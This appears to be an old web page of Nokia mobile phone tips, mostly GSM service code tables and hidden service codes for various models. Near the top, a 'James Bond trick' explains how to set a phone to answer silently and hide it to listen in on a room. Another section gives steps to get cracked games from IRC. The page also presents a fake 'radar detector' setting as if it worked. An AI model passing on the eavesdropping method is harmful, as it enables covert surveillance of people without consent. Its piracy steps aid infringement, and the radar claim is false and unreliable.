4. Then Press * and wait until it disappears and appears again, then press * one more time and 04*PIN*PIN*PIN#


Nokia Speed Trap Detector Urban Legend spread by Nokia Engineers ;^)
The settings for radar speed traps detector. Your Nokia cell phone can be programmed to pick up radar speed traps, when programmed your cell phone picks up the radar and alerts you on the message alert tone. ( Doesn't work with Nokia 7110! )
1. Enter your menu
2. Select settings
3. Select security settings
4. Select closed user group
5. Select on
6. Enter 00000
7. Press ok
8. Clear back to normal, within a few seconds your phone will display a radar sign with five zero's next to it. It is now activated.
Unfortunately only Nokia phones have this function. The Cell Phone info display needs to be de-activated. Settings -> Phone Settings -> Cell Info display. Each time you turn off your phone, or even each time you loose contact with your carrier, you'll have to activate it again... It is done using steps 1 through 5 above, but the number (00000) will be already on the field as a default.

The James Bond Trick



If you short-circuit the left middle and right pins on the bottom of the phone with all connections touching each other, the Nokia software hangs! The profile "Headset" will be activated. Before you do this just activate the "Automatic Answer" in the headset profile and set the ringing volume to "Mute". Now you can use your phone for checking out what people are talking about in a room. Just place it under a table in a room and call it. The phone receives the call without ringing and you can listen to what people are saying! Network Monitor
There is a hidden menu inside your Nokia phone. If you want to activate it, you'll have to re-program some chips inside of your phone.
Check your software version. You can only continue if you have v4.33, v4.73 or v5.24.
Take apart the phone.
De-solder the EEPROM (ATMEL AT 24C64)
Read out the data with an EEPROM programmer and save it to a file (Backup)
If you have v.33 or v4.73, change the address "03B8" from "00" to "FF"
If you have v5.24 then change the address "0378" from "00" to "FF"
Write the new data to the EEPROM and solder it back to the phone
Power on your phone and you should have "Netmonitor" enabled.
The Network Monitor gives you the following information:
Carrier number, MS RX Level in DBM, Received signal quality, MS TX power level, C1 (Path loss criterion, used for cell selection and reselection). The range is -99 to 99, RTL (Radio link timeout), Timeslot, Indication of the transmitter status, Information on the Network parameters, TMSI (Temporary Mobile Subscriber Identity), Cell identification (Cell ID, Number of cells being used), MCC (Mobile country code), MCN (Mobile network code), LAC (Location area code), Ciphering (On/Off), Hopping (On/Off), DTX (On/Off), Discard cell barred information.


Game Hacking with Blizzard



Get the file called the 'BlizzardN-GAGE.SIS' from IRC get in #mediaplace on Efnet (note: Downloading cracked/Hacked games is illegal unless you already own a copy of game)
The Blizzard Nokia N-Gage Installer.
1. Unpack Blizzard.sis file that you get from mIRC
2. Transfer the .sis file to your N-Gage
3. Get the .blz (N-gage ROM) from mIRC
4. copy the file to the root dir of your MMC (16MB MMC)Multimedia Card
5. Use the Blizzard application to unpack the .blz file
6. After unpacking the sonic icon should appeared in the MENU
7. Clicked sonic icon and it should work !



List of compatible games for the 3650,6600 and the N-gage that work:
[3650]
SonicN (v.2.5+)
Puyo Pop (v.2.5+)
[6600]
SonicN
Puyo Pop
Pandemonium
Tomb Raider
Super Monkey Ball
Tony Hawks Pro Skater
[N-Gage]
SonicN
Puyo Pop
Pandemonium
Tomb Raider
Super Monkey Ball
Tony Hawks Pro Skater
GSM Network Services Command Strings
When various network functions are selected via the cellphone's menu using the keypad, the cellphone automatically generates the corresponding GSM network command string and transmits it to the network. These commands can however be manually entered via the keypad.


Each command is prefixed with either one or two * or # characters as follows:
** Register and Activate
* Activate
## De-Register (and Deactivate)
# Deactivate
*# Check Status
© Call button


Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key - this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).
Command Description Command String
Security
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©
Display IMEI *#06#
Call Forwarding (Diversions)
De-register all call diversions ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©
Unconditionally divert all calls to number and activate **21*number#©
Activate unconditionally divert all calls *21#©
De-register unconditionally divert all calls ##21#©
Deactivate unconditionally divert all calls #21#©
Check status of unconditionally divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Divert on not reachable to number and activate **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Divert on busy to number and activate /td> **67*number#©<
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©
Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)
Call barring
Activate barr all outgoing calls (see Security to set code) **33*code#©
Deactivate barr all outgoing calls #33*code#©
Check status of barr all outgoing calls *#33#©
Activate barr all calls **330*code#©
Deactivate barr all calls #330*code#©
Check status of barr all calls /td> *#330*code#©<
Activate barr all outgoing international calls **331*code#©
Deactivate barr all outgoing international calls #331*code#©
Check status of barr all outgoing international calls *#331#©
Activate barr all outgoing international calls except to home country **332*code#©
Deactivate barr all outgoing international calls except to home country #332*code#©
Check status of barr all outgoing international calls except to home country *#332#©
Activate barr all outgoing calls **333*code#©
Deactivate barr all outgoing calls #333*code#©
Check status of barr all outgoing calls *#333#©
Activate barr all incoming calls **35*code#©
Deactivate barr all incoming calls #35*code#©
Check status of barr all incoming calls *#35#©
Activate barr all incoming calls when roaming **351*code#©
Deactivate barr all incoming calls when roaming #351*code#©
Check status of barr all incoming calls when roaming *#351#©
Activate barr all incoming calls **353*code#©
Deactivate barr all incoming calls #353*code#©
Check status of barr all incoming calls *#353#©
Call waiting
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©
Calling Line Identification
The following only works if CLIP and CLIR are enabled (ask your service provider)
CLIP: Presentation of the number of the incoming call
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one's own number to the to the called party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©
COLP: Presentation of the actual number reached (if number called was diverted to another number
Activate COLP *76#©
Deactivate COLP #76#©
Check status of COLP *#76#©
COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
Activate COLR *77#©
Deactivate COLR #77#©
Check status of COLR *#77#©

Cellphone Services
10 All types of cellphone services
11 Speech service
12 Data service
13 Fax
14 Datex-J
15 Teletex
16 Short message service (SMS)
18 All data services without SMS
19 All cellphone services without SMS

Carrier Services
20 All services
21 All asynchronous services
22 All synchronous services
23 3.1kHz services
24 Synchronous point-to-point connections including PAD's (all synchronous data services)
25 Asynchronous point-to-point connections including PAD's (all asynchronous data services)
26 Data packet sending including PAD's (all synchronous data packet services)
27 Services with PAD-share
29 Digital connection with 12kbps

GSM Network Service Codes
Note that at present only the following service codes are in use:
11 Speech
13 fax
25 data

Cell Broadcast
While Short Message Service (SMS) can be configured as a personal service, Cell Broadcast is a general service which is designed for subscribers of a specific cell or topic. For example, a subscriber to cell 050 in England will receive information on the GSM tower currently being used by their phone. This new concept brings a whole new meaning to the term mobile communications as the phone is now able to receive information such as share prices or weather updates without the need of data cards and computers. At present the following message types exist (note: this may vary from carrier to carrier and some carriers may charge for this service):

Code Title
000 Index
010 Flashes
020 Hospitals
022 Doctors
024 Pharmacy
030 Long Distant Road Reports
032 Local Road Reports
034 Taxis
040 Weather
050 District
052 Network Information
054 Operator Services
056 Directory Inquiries (national)
057 Directory Inquiries (international)
058 Customer Care (national)
059 Customer Care (international)

In the future one will be able to control each individual call by use of the following service codes. To do this the user has to insert the service code in front of the last # in the MMI command above.


Or More


Secret Codes for some Nokia models
Nokia 9000/9000i

To view IMEI number *#06#
To view Software Version enter *#8110# Latest Version is under Phone Info.
To view Week and Year of manufacture enter *#3283#

Nokia 9110

*#06# for checking the IMEI (International Mobile Equipment Identity)
*#0000# shows the SW version.

Latest software version: v5.02 (26-08-99)RAE-2

Nokia 7110

*#06# for checking the IMEI (International Mobile Equipment Identity)
*#0000# To view Software Version.
*#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.
*#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart.
*#4720# - Half Rate Codec activation. It will automatically restart
*#4720* - Half Rate Codec deactivation. It will automatically restart
*#746025625# - Sim clock allowed status.
*#92702689# [*#war0anty#] - takes you to a secret menu with 6 choices:

1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997)
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repairment - if found (0000)
5. makes you capebel of transferring user data if you have the gear for it
6. shows how many hours the phone has been on

Latest software version: 4.77 25-01-00 NSE-5 - EFR and half rate codes do not work with these version.

V 4.76 13-01-00 NSE-5
V 4.75 07-01-00 NSE-5
V 4.73 15.11.99 NSE-5

Nokia 6190

*#06# for checking the IMEI (International Mobile Equipment Identity)
*#6190# shows the SW version.
*#92772689# (after removing the analog module) shows service menu.
*3001#12345[OK] to enter test mode.
*#639# to change NAM.

Nokia 3810

To view IMEI number *#06#
To view Software Version enter *#3810#

Nokia 6120 / 6160 / 6162 (TDMA phones)

*#92772689# for checking ISDN number.
*3001#12345# for field test mode and nam selection and some other stuff...
*#9999# shows the SW version


Nokia 3210 Secret Codes
Nokia 3210

*#06# for checking the IMEI (International Mobile Equipment Identity) Information you get from the IMEI:

XXXXXX XX XXXXXX X

TAC FAC SNR SP


TAC = Type approval code
FAC = Final assembly code
SNR = Serial number
SP = Spare

*#0000# To view Software Version.

#746025625# [*#sim0clock#]
Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.

*#92702689# [*#war0anty#] takes you to a secret menu with 6 choices:

1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997)
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repairment - if found (0000)
5. makes you capebel of transferring user data if you have the gear for it
6. shows how many hours the phone has been on

Latest software version: V 5.02 NSE-8/9

*#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.
*#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart.
*#4720# - Half Rate Codec activation. It will automatically restart
*#4720* - Half Rate Codec deactivation. It will automatically restart

Enhanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (Algebraic Code Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced by about 5% when using the ERF option.
Related Posts Plugin for WordPress, Blogger...